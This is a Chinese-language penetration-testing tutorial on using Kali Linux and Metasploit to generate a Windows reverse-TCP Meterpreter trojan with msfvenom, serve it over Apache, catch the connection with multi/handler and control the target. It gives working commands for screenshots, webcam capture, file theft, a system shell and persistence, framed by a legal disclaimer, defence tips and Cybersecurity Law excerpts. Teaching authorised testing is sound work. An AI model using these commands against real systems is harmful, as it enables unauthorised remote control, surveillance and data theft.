Kali+Metasploit 木马生成、植入与控制靶机全流程（经典版基础篇）

⚠️ 重要声明
本文仅用于网络安全学习、渗透测试教学、授权合规检测，严禁用于非法入侵、破坏、窃取数据等违法犯罪行为。任何未经授权的攻击行为均违反《网络安全法》《刑法》等法律法规，后果自负。

一、实验环境

• 攻击机：Kali Linux（IP：192.168.29.131，以实际为准）

• 靶机：Windows 7/10/11（关闭Windows Defender、防火墙，仅内网测试）

• 工具：Metasploit Framework、msfvenom

• 网络：同一局域网，互通

二、生成Windows反向木马（核心）

msfvenom 是 MSF 专用载荷生成器，生成反向连接木马（靶机主动连攻击机）。

# 生成64位Windows反向TCP木马
msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost=192.168.29.131   # 你的Kali IP
lport=6666             # 监听端口
-f exe -o test.exe

• -p：指定Payload

• lhost：攻击机IP

• lport：监听端口

• -f exe：输出exe格式

• -o：输出文件名

生成成功后，得到 test.exe 木马文件。

三、启动MSF监听

# 启动MSF控制台
msfconsole

# 加载监听模块
use exploit/multi/handler

# 与生成木马一致的Payload
set payload windows/x64/meterpreter/reverse_tcp

# 设置IP和端口
set lhost 192.168.29.131
set lport 6666

# 查看配置
show options

# 开始监听
exploit

监听启动后，等待靶机运行木马上线。

四、木马植入（合法场景）

• 内网共享/U盘传输

• 自建HTTP下载（教学演示）

# Kali启动Apache
systemctl start apache2
# 复制木马到网页目录
cp test.exe /var/www/html
# 靶机访问 http://192.168.29.131/test.exe 下载

仅授权环境使用，禁止社工、钓鱼等非法分发。

五、获取会话与远程控制

靶机双击运行 test.exe，攻击机立即返回Meterpreter会话。

常用控制命令

sysinfo          # 系统信息
ps               # 进程列表
getuid           # 当前用户
screenshot       # 截屏
webcam_snap      # 摄像头拍照（如有）
download c:\test.txt  # 下载文件
upload shell.exe c:\  # 上传文件
shell            # 进入系统CMD
persistence      # 持久化（测试用）
exit             # 退出会话

六、防御建议

1. 开启杀毒软件、防火墙

2. 禁止运行未知exe

3. 关闭不必要自启动、计划任务

4. 及时打系统补丁

5. 企业部署EDR、流量审计

附：中华人民共和国网络安全法（核心条款）

第一章 总则

第二条 在中华人民共和国境内建设、运营、维护和使用网络，以及网络安全的监督管理，适用本法。
第三条 国家坚持网络安全与信息化发展并重，遵循积极利用、科学发展、依法管理、确保安全的方针。
第五条 国家采取措施，监测、防御、处置来源于境内外的网络安全风险和威胁，保护关键信息基础设施免受攻击、侵入、干扰和破坏。
第十二条 任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络危害国家安全、宣扬恐怖主义、极端主义、煽动颠覆国家政权、推翻社会主义制度，不得利用网络侵害他人名誉、隐私、知识产权和其他合法权益。

第二章 网络安全支持与促进

第二十一条 国家实行网络安全等级保护制度。网络运营者应当按照等级保护制度要求，履行安全保护义务。
第二十五条 网络运营者应当制定网络安全事件应急预案，及时处置系统漏洞、计算机病毒、网络攻击、网络侵入等安全风险。
第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事前款规定的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。

第五章 监测预警与应急处置

第五十五条 发生网络安全事件，应当立即启动网络安全事件应急预案，对网络安全事件进行调查和评估，要求网络运营者采取技术措施和其他必要措施，消除安全隐患，防止危害扩大。

第六章 法律责任

第六十三条 违反本法第二十七条规定，从事危害网络安全的活动，或者提供专门用于从事危害网络安全活动的程序、工具，或者为他人从事危害网络安全的活动提供技术支持、广告推广、支付结算等帮助，尚不构成犯罪的，由公安机关没收违法所得，处五日以下拘留，可以并处五万元以上五十万元以下罚款；情节较重的，处五日以上十五日以下拘留，可以并处十万元以上一百万元以下罚款。
单位有前款行为的，由公安机关没收违法所得，处十万元以上一百万元以下罚款，并对直接负责的主管人员和其他直接责任人员依照前款规定处罚。
违反本法第二十七条规定，受到治安管理处罚的人员，五年内不得从事网络安全管理和网络运营关键岗位的工作；受到刑事处罚的人员，终身不得从事网络安全管理和网络运营关键岗位的工作。

学习网络安全，坚守法律底线，共建安全网络环境。